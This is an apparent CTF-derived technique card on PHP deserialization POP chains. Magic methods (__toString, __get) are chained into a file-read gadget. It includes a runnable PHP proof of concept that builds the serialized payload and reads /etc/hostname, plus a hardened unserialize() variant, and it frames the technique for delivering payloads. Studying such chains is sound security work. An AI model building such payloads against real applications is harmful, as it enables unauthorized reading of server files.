web php pop-chain deserialization magic-methods file-read gadget-chain

Wire a deserialized object graph so magic methods chain into a file-read or include gadget.

POP Chain to File Read through __toString / __get

Magic methods create deferred execution edges: the code runs not when unserialize() returns but later, when the object graph is touched. Any string context (echo, concatenation, comparison, logging) or read of an undefined or inaccessible property can steer execution into attacker-controlled object properties. The work is usually getting the right method order across several harmless-looking classes, not finding a single obviously dangerous one.

Why It Works

  • __wakeup runs during unserialize(), __destruct when the object is freed, __toString when the object lands in a string context, and __get when code reads a property the object does not expose; because the attacker chooses which class sits in each property, these calls can be chained until a useful sink (file read, include) is reached.

Vulnerable Pattern

  • unserialize() on attacker-controlled input (cookie, hidden field, cache entry) in an app whose classes define convenience magic methods that dereference nested objects, e.g. a __toString that concatenates a child property or a __get that forwards to a wrapped object.

Exploit Flow

  1. Map the object graph carefully: every class loaded in the deserializing context, its magic methods, and which properties those methods touch.
  2. Find the first stringification or undefined-property access the deserialized object reaches after unserialize() (a log line, a template echo, a comparison).
  3. Wire objects so one magic method triggers the next until the useful file-read or include method runs, then serialize the graph and deliver it.

Variations

  • File-read gadgets, include gadgets, or gadgets feeding a second-stage deserialization / autoloader path.

Common Blockers

  • Missing class definitions in the deserializing context (unserialize() then yields __PHP_Incomplete_Class and no magic method fires), private/protected properties whose serialized names carry \0-delimited class prefixes that get mangled in transit, or the final gadget expecting subtle state constraints (a non-empty property, a specific type, an open handle).

PoC Sketch

// Flan->name   -> Clash   (Flan::__toString stringifies ->name)
// Clash->flan1 -> Baker   (Clash::__toString reads a property Baker lacks, so Baker::__get fires)
// Baker references the getter object that reads a chosen path
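The Exploit Flow steps and the sketch above, carried through as a runnable PHP example. This is an added illustration, not the challenge's code: the class bodies for Flan, Clash, Baker and the FileReader sink are assumed here to match the sketch's shape, and only the three-hop wiring (name -> flan1 -> reader) comes from the sketch.

```php
<?php
// Added example: hypothetical app classes shaped like the sketch
// (Flan -> Clash -> Baker -> reader). Not the challenge's real code.

class Flan {
    public $name;                              // attacker sets this to a Clash
    public function __toString(): string {
        return "flan:" . $this->name;          // string context -> Clash::__toString
    }
}

class Clash {
    public $flan1;                             // attacker sets this to a Baker
    public function __toString(): string {
        return (string) $this->flan1->recipe;  // Baker has no "recipe" -> Baker::__get
    }
}

class Baker {
    private $reader;                           // private: serialized as "\0Baker\0reader"
    public function __construct($reader) { $this->reader = $reader; }
    public function __get($prop) {
        return $this->reader->read($prop);     // forwards to the wrapped object
    }
}

class FileReader {
    public $path;
    public function read($unused) {
        return file_get_contents($this->path); // the file-read sink
    }
}

// Attacker side: build the graph bottom-up and serialize it.
function buildPayload(string $path): string {
    $reader = new FileReader();
    $reader->path = $path;                     // chosen path
    $clash = new Clash();
    $clash->flan1 = new Baker($reader);        // Clash::__toString -> Baker::__get
    $flan = new Flan();
    $flan->name = $clash;                      // Flan::__toString -> Clash::__toString
    return serialize($flan);
}

// Vulnerable app side: unserialize, then use the object in a string context.
function vulnerableHandler(string $blob): string {
    $obj = unserialize($blob);                 // no allowed_classes restriction
    return "Hello, " . $obj;                   // concatenation starts the chain
}

// Hardened variant: refuse object instantiation entirely. The result is a
// __PHP_Incomplete_Class, so no magic method in the chain ever runs.
function hardenedHandler(string $blob): string {
    $obj = unserialize($blob, ['allowed_classes' => false]);
    return $obj instanceof __PHP_Incomplete_Class ? "rejected" : "Hello, " . $obj;
}

$payload = buildPayload('/etc/hostname');
// Show the \0 bytes around the private property name; they must survive
// transport (URL-encode as %00) or the Baker object will not deserialize.
echo str_replace("\0", '\0', $payload), "\n";
echo vulnerableHandler($payload), "\n";        // prints flan:<contents of /etc/hostname>
echo hardenedHandler($payload), "\n";          // prints "rejected"
```

Run it with `php chain.php`. Two checks worth doing before delivering a real payload: confirm every class in the graph is loaded (or autoloadable) at the unserialize() call site, and confirm the transport preserves the `\0` bytes that private and protected property names carry, since a lost null byte silently drops that property and the chain stops at the broken hop.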

Good Situations To Use It

  • You control a serialized blob the app deserializes.
  • The codebase defines chainable magic methods.
  • A reachable gadget reads files or includes paths.

Sources

  • midnight_flag2026/web/clash_of_flans